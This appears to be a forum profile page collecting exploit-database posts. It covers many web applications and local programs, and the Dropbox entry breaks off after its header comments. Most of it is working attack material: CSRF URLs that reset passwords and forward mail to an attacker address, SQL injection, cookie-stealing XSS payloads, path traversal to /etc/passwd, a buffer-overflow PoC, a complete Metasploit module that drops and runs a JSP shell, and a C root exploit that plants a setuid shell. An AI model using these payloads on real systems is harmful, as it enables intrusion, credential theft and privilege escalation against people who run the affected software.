
Everything posted by HireHackking
-
Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/58076/info

MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com
-
ZenPhoto - 'index.php' SQL Injection
source: https://www.securityfocus.com/bid/58078/info

Zenphoto is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Zenphoto 1.4.4.1 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en [Blind SQL Injection]
-
OpenEMR - 'site' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58085/info

OpenEMR is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. OpenEMR 4.1.1 is vulnerable; other versions may also be affected.

http://www.example.com/openemr/[DIR]/[SCRIPT]?site="><script>alert(1);</script>
-
ZeroClipboard 1.9.x - 'id' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58116/info

ZeroClipboard is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ZeroClipboard versions prior to 1.1.7 are vulnerable.

http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
-
PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting
source: https://www.securityfocus.com/bid/58081/info

PHPmyGallery is prone to multiple cross-site scripting vulnerabilities and a local file-disclosure vulnerability because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. PHPmyGallery 1.51.010 and prior versions are vulnerable.

http://www.www.example.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>

http://www.www.example.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>

http://www.example.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions
-
Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities
source: https://www.securityfocus.com/bid/58131/info

Photodex ProShow Producer is prone to multiple arbitrary code-execution vulnerabilities. An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a customized library file from the application path that contains specially crafted code. Successful exploits will compromise the application in the context of the currently logged-in user. Photodex ProShow Producer 5.0.3297 is vulnerable; other versions may also be affected.

// wine gcc -Wall -shared inject.c -o ddraw.dll
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH) {
        MessageBox(0, "DLL Injection", "DLL Injection", 0);
    }
    return TRUE;
}
-
WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/58135/info

The Smart Flv plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link

https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29
-
phpMyRecipes - Multiple HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/58160/info

phpMyRecipes is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible. phpMyRecipes 1.2.2 is vulnerable; other versions may also be affected.

POST /recipes/addrecipe.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

r_name="><script>alert(0)</script>&r_category=13&r_servings=1&r_difficulty=1&i_qty=&i_unit=4&i_item=0&i_item_text=&r_instructions="><script>alert(0)</script>
-
JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/58164/info

JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. JForum 2.1.9 is vulnerable; other versions may also be affected.

GET /jforum/jforum.page?module=posts&start=0&forum_id=1&quick=1&disable_html=1&action=insertSave4a9d0%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5d668e3a93160a27e&topic_id=2 HTTP/1.1
-
Batavi - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58151/info

Batavi is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Batavi 1.2.2 is vulnerable; other versions may also be affected.

<root>/admin/index.php?file_manager&file_manager&"><script>alert(123)</script></a><a href="
-
Geeklog - Cross-Site Scripting
source: https://www.securityfocus.com/bid/58209/info

Geeklog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Geeklog 1.8.2 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/submit.php?type=calendar" method="post">
  <input type="hidden" name="mode" value="Submit">
  <input type="hidden" name="calendar_type" value='"><script>alert(document.cookie);</script>'>
  <input type="submit" id="btn">
</form>
-
Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow (PoC)
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt

Vendor:
================================
git-scm.com

Product:
================================
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319

Vulnerability Type:
===================
Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
=========================
Git Windows SVN ssh-agent.exe is vulnerable to a buffer overflow. Under the cmd dir in Git there is a start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is a local attack vector: if the "start-ssh-agent.cmd" file is replaced with a specially crafted malicious '.cmd' file we cause a buffer overflow, and code execution may become possible.

Fault module seems to be msys-1.0.dll
File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-------------
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B

Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOOOOOOOOOM! we control EIP.

Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0xffffffff   -1
ecx            0x680a4c3a   1745505338
edx            0x680a4c3a   1745505338
ebx            0x28f90c     2685196
esp            0x28f884     0x28f884
ebp            0x41414141   0x41414141
esi            0x28f8fc     2685180
edi            0x2660       9824
eip            0x41414141   0x41414141
eflags         0x10246      [ PF ZF IF RF ]
cs             0x23         35
ss             0x2b         43
ds             0x2b         43
es             0x2b         43
fs             0x53         83
gs             0x2b         43

POC code(s):
===============
Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory; once run, it will cause a buffer overflow and overwrite EIP.

Save the following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it!
'''

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#======================================================

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "

x=open(file,"w")
eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()

src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")

print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "====================================\n"

'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 10, 2015
Sept 26, 2015 : Public Disclosure

Exploitation Technique:
=======================
Local

Description:
==========================================================
Vulnerable Product: [+] Git-1.9.5-preview20150319.exe
===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
-
Plogger - Multiple Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/58271/info

Plogger is prone to the following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:

1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities
3. A cross-site request forgery vulnerability

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible. Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.

+---+[ Feedback.php Sqli ]+---+

Injectable on the entries_per_page parameter in Feedback.php:

http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'

PoC

if (isset($_REQUEST['entries_per_page'])) {
    $_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
    $_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);

+---+[ CSRF In Admin Panel ]+---+

Plogger is not using any parameter or security token to protect against CSRF, so it is vulnerable to CSRF on all locations inside the admin panel.

+---+[ XSS ]+---+

There are multiple XSS in Plogger, like editing a comment inside the admin panel. They are filtering the comments for normal users but not for admins. And as it is CSRF everywhere, we can edit a comment via CSRF and change it to any XSS vector.

XSS
http://www.example.com/plogger/plog-admin/plog-feedback.php
Edit a comment with any XSS vector, or just do it via CSRF.

Upload a file and enter any XSS vector as the name:
http://www.example.com/plogger/plog-admin/plog-upload.php

It can be exploited in many ways, like CSRF + SQLi inside the admin panel, which is described above.

XSS in Edit Comment. CSRF + XSS

<html>
<head>
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
  <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
  <div>
    <div class="strong">Edit Comment</div>
    <p>
      <label class="strong" accesskey="a" for="author">Author:</label><br />
      <input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
    </p>
    <p>
      <label class="strong" accesskey="e" for="email">Email:</label><br />
      <input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
    </p>
    <p>
      <label class="strong" accesskey="u" for="url">Website:</label><br />
      <input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
    </p>
    <p>
      <label class="strong" accesskey="c" for="comment">Comment:</label><br />
      <textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
    </p>
    <input type="hidden" name="pid" value="4" />
    <input type="hidden" name="action" value="update-comment" />
    <input class="submit" name="update" value="Update" type="submit" />
    <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
  </div>
</form>

Another XSS
http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit the caption to an XSS vector inside the admin panel.

Again CSRF + XSS

<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
  <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
  <div>
    <div class="strong">Edit Image Properties</div>
    <p>
      <label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
      <input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
    </p>
    <p>
      <label class="strong" for="description">Description:</label><br />
      <textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
    </p>
    <p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
    <input type="hidden" name="pid" value="1" />
    <input type="hidden" name="action" value="update-picture" />
    <input class="submit" name="update" value="Update" type="submit" />
    <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
  </div>
</form>

CSRF Admin Password Reset and XSS
plog-options.php

<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
  <table class="option-table" cellspacing="0">
    <tbody>
      <tr class="alt">
        <td class="left"><label for="admin_username"></label></td>
        <td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
      </tr>
      <tr>
        <td class="left"><label for="admin_email"></label></td>
        <td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
      </tr>
      <tr class="alt">
        <td class="left"><label for="admin_password"></label></td>
        <td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
      </tr>
      <tr>
        <td class="left"><label for="confirm_admin_password"></label></td>
        <td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
      </tr>
      <tr>
        <td class="left"><label for="gallery_url"></label></td>
        <td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td>
      </tr>
    </tbody>
  </table>
  <input class="submit" name="submit" value="DOne" type="submit">
</form>
-
Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation
Source: http://www.halfdog.net/Security/2015/ApportKernelCrashdumpFileAccessVulnerabilities/

Problem description:

On the Ubuntu Vivid Linux distribution apport is used for automated sending of client program crash dumps but also of kernel crash dumps. For kernel crashes, upstart or SysV init invokes the program /usr/share/apport/kernel_crashdump at boot to prepare crash dump files for sending. This action is performed with root privileges. As the crash dump directory /var/crash/ is world writable and kernel_crashdump performs file access in an unsafe manner, any local user may trigger a denial of service or escalate to root privileges. If symlink and hardlink protection is enabled (which should be the default for any modern system), only denial of service is possible.

The problematic syscalls in kernel_crashdump are:

open("/var/crash/linux-image-3.19.0-18-generic.0.crash", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE|O_CLOEXEC, 0666) = 30
...
open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31

Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also, opening of the input file does not care about links.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38353.zip
-
ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ManageEngine EventLog Analyzer Remote Code Execution',
      'Description'    => %q{
        This module exploits a SQL query functionality in ManageEngine EventLog Analyzer
        v10.6 build 10060 and previous versions. Every authenticated user, including the
        default "guest" account can execute SQL queries directly on the underlying Postgres
        database server. The queries are executed as the "postgres" user which has full
        privileges and thus is able to write files to disk. This way a JSP payload can be
        uploaded and executed with SYSTEM privileges on the web server.

        This module has been tested successfully on ManageEngine EventLog Analyzer 10.0
        (build 10003) over Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '38173']
        ],
      'Platform'       => ['win'],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 11 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8400),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]),
        OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ])
      ], self.class)
  end

  def uri
    target_uri.path
  end

  def check
    # Check version
    vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'event', 'index3.do')
    })

    if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def sql_query(cookies, query)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'event', 'runQuery.do'),
      'cookie'    => cookies,
      'vars_post' => {
        'execute' => 'true',
        'query'   => query,
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!")
    end

    res
  end

  def generate_jsp_payload(cmd)
    decoder = rand_text_alpha(4 + rand(32 - 4))
    decoded_bytes = rand_text_alpha(4 + rand(32 - 4))
    cmd_array = rand_text_alpha(4 + rand(32 - 4))

    jsp_code = '<%'
    jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
    jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
    jsp_code << "String [] #{cmd_array} = new String[3];\n"
    jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n"
    jsp_code << "#{cmd_array}[1] = \"/c\";\n"
    jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
    jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n"
    jsp_code << '%>'
    jsp_code
  end

  def exploit
    print_status("#{peer} - Retrieving JSESSION ID")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'event', 'index3.do'),
    })

    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
      jsessionid = $1
      print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
    end

    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"),
      'vars_post' => {
        'forChecking' => 'null',
        'j_username'  => datastore['USERNAME'],
        'j_password'  => datastore['PASSWORD'],
        'domains'     => "Local Authentication\r\n",
        'loginButton' => 'Login',
        'optionValue' => 'hide'
      }
    })

    if res && res.code == 302
      redirect = URI(res.headers['Location'])
      print_status("#{peer} - Location is [ #{redirect} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
    end

    # Follow redirection process
    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri'    => "#{redirect}",
      'method' => 'GET'
    })

    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
      cookies = res.get_cookies
      print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
    else
      fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
    end

    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')

    print_status("#{peer} - Executing SQL queries")

    # Remove large object in database, just in case it exists from previous exploit attempts
    sql = 'SELECT lo_unlink(-1)'
    result = sql_query(cookies, sql)

    # Create large object "-1". We use "-1" so we will not accidentally overwrite large objects in use by other tasks.
    sql = 'SELECT lo_create(-1)'
    result = sql_query(cookies, sql)

    if result.body =~ /menuItemRow\">([0-9]+)/
      loid = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
    end

    select_random = rand_text_numeric(2 + rand(6 - 2))

    # Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to bypass
    # OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.
    sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
    result = sql_query(cookies, sql)

    # Export our large object id data into a WAR file
    sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');"
    sql_query(cookies, sql)

    # Remove our large object in the database
    sql = 'SELECT lo_unlink(-1)'
    result = sql_query(cookies, sql)

    register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}")

    print_status("#{peer} - Executing JSP payload")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, jsp_name),
    })

    # If the server returns 200 we assume we uploaded and executed the payload file successfully
    unless res && res.code == 200
      print_status("#{res.code}\n#{res.body}")
      fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!")
    end
  end
end
-
WordPress Plugin Uploader - 'blog' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58285/info

The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Uploader 1.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E
-
Foscam < 11.37.2.49 - Directory Traversal
source: https://www.securityfocus.com/bid/58290/info

Foscam is prone to a directory-traversal vulnerability. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.

GET //../proc/kcore HTTP/1.0
-
HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58293/info

HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected.

http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3&topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null&topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null
-
rpi-update - Insecure Temporary File Handling / Security Bypass
// source: https://www.securityfocus.com/bid/58292/info
//
// rpi-update is prone to an insecure temporary file-handling vulnerability and a
// security-bypass vulnerability. An attacker can exploit these issues to perform
// symbolic-link attacks, overwriting arbitrary files in the context of the affected
// application, bypass certain security restrictions, and perform unauthorized
// actions. This may aid in further attacks.

/* Local root exploit for rpi-update on Raspberry Pi.
   Vulnerability discovered by Technion, technion@lolware.net
   https://github.com/Hexxeh/rpi-update/

   larry@pih0le:~$ ./rpix updateScript.sh
   [*] Launching attack against "updateScript.sh"
   [+] Creating evil script (/tmp/evil)
   [+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
   [+] Initialize inotify on /tmp/updateScript.sh
   [+] Waiting for root to change perms on "updateScript.sh"
   [+] Opening root shell (/tmp/sh)
   # <-- Yay!

   Larry W. Cashdollar
   http://vapid.dhs.org
   @_larry0
   Greets to Vladz. */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>

/* Create a small c program to pop us a root shell */
int create_nasty_shell(char *file)
{
    char *s = "#!/bin/bash\n"
              "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
              "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
              "chmod 4755 /tmp/sh;\n";
    int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
    write(fd, s, strlen(s));
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    int fd, wd;
    char buf[1], *targetpath, *cmd, *evilsh = "/tmp/evil", *trash = "/tmp/trash";

    if (argc < 2) {
        printf("Usage: %s <target file> \n", argv[0]);
        return 1;
    }

    printf("[*] Launching attack against \"%s\"\n", argv[1]);
    printf("[+] Creating evil script (/tmp/evil)\n");
    create_nasty_shell(evilsh);

    targetpath = malloc(sizeof(argv[1]) + 32);
    cmd = malloc(sizeof(char) * 32);
    sprintf(targetpath, "/tmp/%s", argv[1]);
    sprintf(cmd, "/usr/bin/touch %s", targetpath);
    printf("[+] Creating target file (%s)\n", cmd);
    system(cmd);

    printf("[+] Initialize inotify on %s\n", targetpath);
    fd = inotify_init();
    wd = inotify_add_watch(fd, targetpath, IN_MODIFY);
    printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
    syscall(SYS_read, fd, buf, 1);
    syscall(SYS_rename, targetpath, trash);
    syscall(SYS_rename, evilsh, targetpath);
    inotify_rm_watch(fd, wd);

    printf("[+] Opening root shell (/tmp/sh)\n");
    sleep(2);
    system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
    return 0;
}
-
WordPress Plugin Count Per Day - 'daytoshow' Cross-Site Scripting
source: https://www.securityfocus.com/bid/58307/info

The Count Per Day plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Count Per Day 3.2.5 and prior versions are vulnerable.

http://www.example.com/wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1
...
/daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show
-
Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation
#!/bin/bash
# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
# Google Dork: N/A
# Date: 29/09/15
# Exploit Author: cenobyte
# Vendor Homepage: https://www.dropbox.com
# Software Link: N/A
# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
# Tested on: OS X Yosemite (10.10.5)
# CVE: N/A
#
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
# versions for OS X allows loading of dynamically linked shared libraries
# that are residing in the same directory. The directory in which
# FinderLoadBundle is located is owned by root and that prevents placing
# arbitrary files there. But creating a hard link from FinderLoadBundle to
# somewhere in a directory in /tmp circumvents that protection thus making it
# possible to load a shared library containing a payload which creates a root
# shell.
#
